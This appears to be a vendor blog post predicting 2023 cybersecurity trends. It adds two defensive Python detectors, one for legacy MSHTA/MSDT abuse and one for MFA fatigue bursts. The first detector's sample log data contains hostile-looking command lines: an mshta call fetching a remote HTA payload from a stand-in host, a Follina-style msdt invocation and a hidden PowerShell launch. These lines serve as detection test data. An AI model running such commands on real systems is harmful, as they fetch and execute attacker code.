Cybersecurity’s continuous cat-and-mouse game requires defenders to constantly adjust to technological progress and develop adequate defenses before attackers’ creative ways exploit nascent security gaps.
Though it dates back to the mid-20th century, the OODA loop (Observe, Orient, Decide, Act), created by US Air Force Colonel John Boyd, is an ideal decision-making construct to guide cyber defenders. This four-step continuous process facilitates learning from conflict, adjusting goals, and enacting required modifications faster and more accurately.
The more than 1.7 million hours of simulated attacks in active environments performed by Cymulate in the last two years have gathered a wealth of field data that a cybersecurity researcher working 24/7 for 195 years could not even dream of.
This wealth of observations, extensively analyzed by the Cymulate research team, provides roots for identifying trends and orienting defensive priorities.
The five predictions below aim to provide cybersecurity professionals with data-driven orientation cues on which to base decisions and act.
1. Operating Systems will be prime targets
In 2022, attackers deepened their understanding of how operating systems can be exploited. They became experts at exploiting gaps in least-privilege configurations to bypass security controls through PowerShell, Control Panel, registry, DLL side-loading, and service spin-up techniques.
They also took advantage of legacy OS components far beyond Office macros, such as MSHTA (the legacy Internet Explorer process still lingering on most Windows operating systems) and MSDT (Microsoft Support Diagnostic Tool) to exploit systems. Beyond Windows, they added Linux and macOS platforms to their exploit kits, toolkits, and attack vectors.
This coming year, attackers will exploit fundamental operating system issues, poorly configured or absent least privilege policies, and legacy components to circumvent security controls.
Scrutinizing operating systems, verifying least-privilege policies and segmentation, and phasing out legacy components where possible are sound starting points for staying secure in the coming year.
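One concrete way to act on the "scrutinize legacy components" advice is to watch for the binaries named above (MSHTA, MSDT) being launched from a parent that has no reason to start them. The following is an added example, not Cymulate's code or tooling: it parses constructed process-creation events in a simple key=value form and flags legacy binaries started by an Office application. The Office-parent heuristic, the field names, and the sample events are assumptions for illustration; a real deployment would feed it EDR or Sysmon process-creation telemetry.

```python
"""Added example (not Cymulate's code): flag legacy Windows components
(MSHTA, MSDT) launched from an Office parent process.
Log lines are constructed; the parent heuristic is an assumption."""
import re
from typing import Iterable

# Legacy components the article names as being abused in 2022.
LEGACY_BINARIES = {"mshta.exe", "msdt.exe"}
# Parents from which launching those binaries is rarely legitimate (assumption).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample events in a "key=value" form, not from any real log.
SAMPLE_EVENTS = [
    "ts=2023-01-10T09:12:01 host=ws01 parent=explorer.exe image=mshta.exe cmd=\"mshta.exe C:\\Tools\\dashboard.hta\"",
    "ts=2023-01-10T09:14:33 host=ws02 parent=winword.exe image=mshta.exe cmd=\"mshta.exe http://203.0.113.10/a.hta\"",
    "ts=2023-01-10T09:15:07 host=ws02 parent=winword.exe image=msdt.exe cmd=\"msdt.exe /id PCWDiagnostic /skip force\"",
    "ts=2023-01-10T09:20:45 host=ws03 parent=svchost.exe image=msdt.exe cmd=\"msdt.exe -id NetworkDiagnosticsWeb\"",
    "ts=2023-01-10T09:22:10 host=ws01 parent=excel.exe image=powershell.exe cmd=\"powershell.exe -w hidden\"",
]

# key=value pairs; values may be double-quoted to allow spaces.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> dict:
    """Parse one key=value event line into a dict (quoted values allowed)."""
    return {
        m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
        for m in FIELD_RE.finditer(line)
    }


def is_legacy_abuse(event: dict) -> bool:
    """True when a legacy binary is started by a suspicious parent."""
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    return image in LEGACY_BINARIES and parent in SUSPICIOUS_PARENTS


def find_alerts(lines: Iterable[str]) -> list:
    """Return (host, parent, image) tuples for events matching the rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if is_legacy_abuse(ev):
            alerts.append((ev["host"], ev["parent"].lower(), ev["image"].lower()))
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print("ALERT: legacy component launched from Office parent:", alert)
```

Note that the rule is deliberately narrow: the last sample event (PowerShell spawned by Excel) is not flagged because PowerShell is not one of the legacy components in scope here, so it would need its own rule. Hosts where MSHTA or MSDT never fire legitimately are candidates for the "phase out legacy components" step rather than for more detection rules.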
2. Abuse of secrets and elevated accounts management will rise
2022 was brimming with attempted and successful attacks capitalizing on flaws in secrets and elevated-account management. The still-prevalent habit of keeping track of critical resources, administrative accounts, and crown jewels in spreadsheets and collaboration tools is a welcome windfall for cyber-attackers. Vulnerabilities inherited from third-party secrets management suppliers further weaken resilience. Attackers’ skills in exploiting insufficiently tight least-privilege policies and secrets mismanagement will continue to evolve and expand in 2023.
Focusing on implementing a true zero-trust approach should be a 2023 priority.
3. Omnichannel phishing and MFA bypassing techniques will improve
Phishing attacks in 2022 saw a massive increase in the use of non-email-based phishing techniques. From established messaging apps like WhatsApp, Facebook Messenger, or LinkedIn to more recent ones like Discord or TikTok, or professional ones like Slack or Microsoft Teams, all were abused to lure users into clicking a compromised link or downloading malware.
To gain control of users’ accounts despite MFA verification, attackers launched MFA fatigue attacks, bombarding users with authentication requests and fake, official-looking login pages. SIM-swapping attacks (transferring a victim’s mobile phone account and phone number to a new SIM card under the attacker’s control in order to impersonate the victim and send or receive SMS, phone calls, messages, and MFA verification codes) skyrocketed in 2022.
Integrating token and biometric factors into MFA procedures and educating employees about these new phishing techniques are two potential strategies organizations may adopt to increase resilience.
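Beyond stronger factors and user education, MFA fatigue has a recognizable signature in the identity provider's logs: a burst of push prompts to one user in a short window, mostly denied or timed out, sometimes followed by an approval. The following is an added example, not Cymulate's code or any vendor's product logic, showing a sliding-window detector over constructed push-notification events. The ten-minute window, the five-prompt threshold, and the event format are assumptions to be tuned per environment.

```python
"""Added example (not Cymulate's code): detect the MFA fatigue pattern,
a burst of push prompts to one user inside a short window.
Events, window and threshold are constructed assumptions."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Tunable thresholds (assumptions, not vendor-recommended values).
WINDOW = timedelta(minutes=10)
PROMPT_THRESHOLD = 5  # prompts within WINDOW before we alert

# Constructed sample push events: (ISO timestamp, user, result).
SAMPLE_PUSH_EVENTS = [
    ("2023-01-10T08:00:05", "alice", "approved"),
    ("2023-01-10T08:31:10", "bob", "denied"),
    ("2023-01-10T08:31:45", "bob", "denied"),
    ("2023-01-10T08:32:20", "bob", "timeout"),
    ("2023-01-10T08:33:02", "bob", "denied"),
    ("2023-01-10T08:34:15", "bob", "approved"),   # the user finally gives in
    ("2023-01-10T09:50:00", "carol", "denied"),   # two isolated denials, far apart
    ("2023-01-10T10:15:00", "carol", "denied"),
]


def parse_ts(value: str) -> datetime:
    """Parse the ISO-8601 timestamp used in the constructed events."""
    return datetime.fromisoformat(value)


def detect_mfa_fatigue(events, window=WINDOW, threshold=PROMPT_THRESHOLD) -> dict:
    """Return {user: {...}} for every user who received at least `threshold`
    push prompts inside any sliding window of length `window`.

    The alert records how many prompts were in the burst, when it started,
    and whether one of them was approved (the fatigue attack succeeding)."""
    recent = defaultdict(deque)  # user -> deque of (timestamp, result) in window
    alerts = {}
    # ISO timestamps sort correctly as strings, so this orders events in time.
    for ts_str, user, result in sorted(events):
        ts = parse_ts(ts_str)
        q = recent[user]
        q.append((ts, result))
        # Drop prompts that fell out of the sliding window.
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            # Later events in the same burst overwrite with the fuller picture.
            alerts[user] = {
                "prompts": len(q),
                "window_start": q[0][0].isoformat(),
                "approved_in_burst": any(r == "approved" for _, r in q),
            }
    return alerts


if __name__ == "__main__":
    for user, info in detect_mfa_fatigue(SAMPLE_PUSH_EVENTS).items():
        print(f"ALERT: possible MFA fatigue against {user}: {info}")
```

In the sample data only bob trips the rule; carol's two denials are 25 minutes apart and never share a window. The `approved_in_burst` flag is the one to escalate on, since an approval at the end of a burst of denials is the outcome the attack is designed to produce and the session it created is what responders need to revoke.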
4. More Nation-State Attacks
The 2022 trend of heightened activity from nation-state-sponsored APTs is likely to worsen in 2023. Critical infrastructures are particularly at risk, as successfully disrupting their activity has a nationwide impact. Beyond attempting disruptive attacks, nation-states will continue to develop and deploy hard-to-detect spying malware for espionage and surveillance purposes. Whatever the purpose, this increases the risk of undetectable, complex unknown-unknown attacks against which detection and response solutions are powerless, and it will require increased vigilance from cyber-defenders.
Validating security controls’ efficacy and segmentation robustness through automated or semi-automated continuous security validation methods is the recommended prevention to limit these attacks’ escalation reach.
5. Off-the-shelf attack tools will become prevalent
The 2022 trend of misusing off-the-shelf attack kits, such as Cobalt Strike, the Sliver framework, or criminal ones like the latest newcomer, Manjusaka, will continue to rise. These kits allow attackers to expand the reach of their attacks through automated flaw-finding probes and attached exploits.
Keeping up with attackers’ progress would benefit from incorporating security validation automation tools that identify security gaps before attackers do.
Now that the accuracy of last year’s predictions can be verified, time will tell how accurate these ones are. What is certain is that remaining secure in 2023 will require all hands on deck.